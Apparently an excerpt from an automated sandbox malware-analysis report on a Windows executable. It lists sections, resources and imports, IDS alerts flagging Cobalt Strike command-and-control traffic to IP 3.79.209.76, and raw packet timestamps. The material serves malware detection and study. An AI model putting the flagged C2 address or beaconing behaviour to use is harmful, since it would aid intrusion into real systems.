.text | 0x1000 | 0x2ecb | 0x3000 | 5d06f4206746907c833a2481f65088c1 | False | 0.5750325520833334 | COM executable for DOS | 6.300274659901053 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4000 | 0x1a08 | 0x1c00 | 1e97f3d49e555f25c36fe5d37cfead01 | False | 0.39620535714285715 | data | 4.65454105213308 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6000 | 0x738 | 0x400 | 2ceacc7ad5a855df52932a54a33adc4d | False | 0.259765625 | data | 3.3218316032948274 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x7000 | 0x361b8 | 0x36200 | 74bdbba1f539597c017848daa85523b5 | False | 0.14270893475750576 | data | 4.0626831582612635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3e000 | 0x400 | 0x400 | b6b1b20025ba3ae165aea709cabb8ef5 | False | 0.912109375 | data | 6.464420599581639 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x1e170 | 0x1ed70 | Device independent bitmap graphic, 205 x 205 x 24, image size 126280, resolution 2835 x 2835 px/m | English | United States | 0.1544094363521216
RT_ICON | 0x75e0 | 0x115a | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.33340837460603334
RT_ICON | 0x8740 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.09408315565031983
RT_ICON | 0x95e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11507220216606498
RT_ICON | 0x9e90 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.12427745664739884
RT_ICON | 0xa3f8 | 0x90b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.791792656587473
RT_ICON | 0xad08 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.03235710911667454
RT_ICON | 0xef30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04595435684647303
RT_ICON | 0x114d8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.075046904315197
RT_ICON | 0x12580 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.15070921985815602
RT_ICON | 0x12a70 | 0x115a | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.33340837460603334
RT_ICON | 0x13bd0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.09408315565031983
RT_ICON | 0x14a78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11507220216606498
RT_ICON | 0x15320 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.12427745664739884
RT_ICON | 0x15888 | 0x90b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.791792656587473
RT_ICON | 0x16198 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.03235710911667454
RT_ICON | 0x1a3c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.04595435684647303
RT_ICON | 0x1c968 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.075046904315197
RT_ICON | 0x1da10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.15070921985815602
RT_MENU | 0x1df00 | 0x4a | data | English | United States | 0.8648648648648649
RT_DIALOG | 0x1df60 | 0x100 | data | English | United States | 0.62890625
RT_DIALOG | 0x1e060 | 0x10c | data | English | United States | 0.6492537313432836
RT_STRING | 0x3cee0 | 0x50 | data | English | United States | 0.75
RT_ACCELERATOR | 0x1df50 | 0x10 | data | English | United States | 1.25
RT_GROUP_ICON | 0x129e8 | 0x84 | data | English | United States | 0.6590909090909091
RT_GROUP_ICON | 0x1de78 | 0x84 | data | English | United States | 0.6515151515151515
RT_MANIFEST | 0x3cf30 | 0x286 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5479876160990712
DLL | Import
KERNEL32.dll | FlsSetValue, CreateFileA, CloseHandle, K32GetModuleInformation, GetModuleHandleA, GetConsoleWindow, lstrcpyW, CreateFileMappingW, MapViewOfFile, GetCurrentProcess, SetUnhandledExceptionFilter, TerminateProcess, FreeLibrary, VirtualAlloc, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, UnhandledExceptionFilter, FlsAlloc, VirtualProtect
USER32.dll | ShowWindow, LoadStringW, RegisterClassExW, GetMessageW, DefWindowProcW, DestroyWindow, CreateWindowExW, SendMessageW, EndDialog, DispatchMessageW, EndPaint, BeginPaint, SetTimer, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, GetDlgItem, UpdateWindow, KillTimer, PostQuitMessage, DialogBoxParamW, LoadAcceleratorsW
ADVAPI32.dll | GetUserNameW
SHELL32.dll | Shell_NotifyIconW
MSVCP140.dll | _Mtx_destroy, _Mtx_unlock, _Cnd_init, _Query_perf_frequency, _Xtime_get_ticks, _Thrd_detach, _Query_perf_counter, _Thrd_start, _Mtx_init, _Cnd_wait, _Thrd_sleep, _Cnd_destroy, _Cnd_signal, _Cnd_do_broadcast_at_thread_exit, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Xout_of_range@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, ?_Throw_C_error@std@@YAXH@Z, ?_Xlength_error@std@@YAXPBD@Z, _Mtx_lock
WS2_32.dll | WSACleanup, recv, htons, gethostbyname, WSAStartup, inet_addr, gethostbyaddr, send, socket, connect, closesocket
CRYPT32.dll | CertEnumSystemStore
VCRUNTIME140.dll | __CxxFrameHandler3, __std_terminate, strstr, __std_exception_copy, memchr, _CxxThrowException, memset, _except_handler4_common, memcpy, __std_exception_destroy, memmove
api-ms-win-crt-heap-l1-1-0.dll | realloc, malloc, _callnewh, free, _set_new_mode
api-ms-win-crt-string-l1-1-0.dll | strncat, strncpy
api-ms-win-crt-runtime-l1-1-0.dll | _configure_wide_argv, _register_onexit_function, _cexit, _crt_atexit, _controlfp_s, _c_exit, _set_app_type, _seh_filter_exe, _exit, exit, _register_thread_local_exe_atexit_callback, _initterm, _initterm_e, _invalid_parameter_noinfo_noreturn, _get_wide_winmain_command_line, _initialize_onexit_table, _initialize_wide_environment, terminate
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf, _set_fmode, __p__commode
api-ms-win-crt-convert-l1-1-0.dll | wcstombs_s
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-19T22:40:04.711841+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49730 | 3.79.209.76 | 80 | TCP
2024-12-19T22:40:06.615659+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49731 | 3.79.209.76 | 80 | TCP
2024-12-19T22:40:10.184763+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49732 | TCP
2024-12-19T22:40:12.460101+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49733 | TCP
2024-12-19T22:40:14.719895+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49734 | TCP
2024-12-19T22:40:16.946092+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49735 | TCP
2024-12-19T22:40:19.139463+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49736 | TCP
2024-12-19T22:40:21.341756+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49737 | TCP
2024-12-19T22:40:23.519951+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49739 | TCP
2024-12-19T22:40:25.721653+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49743 | TCP
2024-12-19T22:40:27.940593+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49745 | TCP
2024-12-19T22:40:30.184707+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49747 | TCP
2024-12-19T22:40:32.389565+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49748 | TCP
2024-12-19T22:40:34.593434+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49749 | TCP
2024-12-19T22:40:37.076058+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49750 | TCP
2024-12-19T22:40:39.262084+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49751 | TCP
2024-12-19T22:40:41.451628+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49752 | TCP
2024-12-19T22:40:43.637480+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49753 | TCP
2024-12-19T22:40:45.859708+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49754 | TCP
2024-12-19T22:40:48.078863+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49755 | TCP
2024-12-19T22:40:50.313429+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49756 | TCP
2024-12-19T22:40:52.531888+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49757 | TCP
2024-12-19T22:40:54.751135+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49758 | TCP
2024-12-19T22:40:57.300211+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49759 | TCP
2024-12-19T22:40:59.572951+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49760 | TCP
2024-12-19T22:41:01.797499+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49762 | TCP
2024-12-19T22:41:04.032576+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49769 | TCP
2024-12-19T22:41:06.238003+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49775 | TCP
2024-12-19T22:41:08.451619+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49781 | TCP
2024-12-19T22:41:10.661934+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49786 | TCP
2024-12-19T22:41:12.853433+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49792 | TCP
2024-12-19T22:41:15.076878+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49798 | TCP
2024-12-19T22:41:17.263569+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49804 | TCP
2024-12-19T22:41:19.468276+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49810 | TCP
2024-12-19T22:41:21.705590+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49815 | TCP
2024-12-19T22:41:24.178894+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49821 | TCP
2024-12-19T22:41:26.459077+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49827 | TCP
2024-12-19T22:41:29.199615+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49833 | TCP
2024-12-19T22:41:31.386751+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49840 | TCP
2024-12-19T22:41:33.601036+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49846 | TCP
2024-12-19T22:41:35.806119+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49852 | TCP
2024-12-19T22:41:38.368416+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49858 | TCP
2024-12-19T22:41:40.937992+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49865 | TCP
2024-12-19T22:41:43.149956+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49871 | TCP
2024-12-19T22:41:45.375076+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49877 | TCP
2024-12-19T22:41:47.592163+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49882 | TCP
2024-12-19T22:41:49.788480+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49888 | TCP
2024-12-19T22:41:51.995130+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49894 | TCP
2024-12-19T22:41:54.188389+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49901 | TCP
2024-12-19T22:41:56.390667+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49907 | TCP
2024-12-19T22:41:58.592336+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49913 | TCP
2024-12-19T22:42:00.970693+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49919 | TCP
2024-12-19T22:42:03.186879+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49926 | TCP
2024-12-19T22:42:05.412463+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49932 | TCP
2024-12-19T22:42:07.800162+0100 | 2033009 | ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response | 1 | 3.79.209.76 | 443 | 192.168.2.4 | 49938 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Dec 19, 2024 22:40:07.038834095 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.038964987 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.039028883 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.043554068 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.043633938 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.043718100 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.048315048 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.048430920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.048504114 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.053064108 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.053212881 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.053272009 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.056885958 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.057005882 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.057090044 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.060677052 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.060805082 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.060873032 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.064560890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.064666033 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.064742088 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.068435907 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.068533897 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.068609953 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.072227955 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.072417974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.072479010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.076045990 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.076176882 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.076241016 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.079885960 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.080008030 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.080087900 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.114505053 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.114561081 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.114821911 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.116446972 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.116497040 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.116559982 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.120259047 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.120428085 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.120496035 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.124124050 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.178592920 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.186691046 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.186829090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.187053919 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.187977076 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.188452959 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.188560009 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.188616037 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191310883 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191431046 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.191534042 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.194525957 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.194578886 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.194629908 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.197112083 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.197190046 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.197206974 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.199898005 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.200018883 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.200026035 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202697039 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202794075 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.202894926 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.205369949 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.205461979 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.205496073 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.207963943 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.208061934 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.208152056 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.210617065 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.210721970 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.210742950 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.213202953 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.213538885 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.213675022 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.215852022 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.215936899 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.215971947 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218581915 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218616962 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.218663931 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.221070051 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.221127987 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.221179008 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.223673105 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.223831892 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.223884106 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.226309061 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.226388931 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.226438999 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229182005 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229235888 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.229259968 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.231515884 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.231611013 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.231709003 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.234132051 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.234194994 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.234364033 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236738920 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236829996 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.236840010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.239398956 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.239451885 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.239489079 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.242006063 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.242096901 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.242114067 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.243949890 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.244031906 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.244070053 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.245851994 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.245934010 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.245971918 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.247777939 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.247848988 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.247912884 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.249715090 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.249784946 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.249855995 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251709938 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251763105 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.251786947 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.253660917 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.253789902 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.253818989 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.255584955 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.255664110 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.255698919 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.257538080 CET80497313.79.209.76192.168.2.4
                                                              Dec 19, 2024 22:40:07.257620096 CET4973180192.168.2.43.79.209.76
                                                              Dec 19, 2024 22:40:07.257703066 CET80497313.79.209.76192.168.2.4
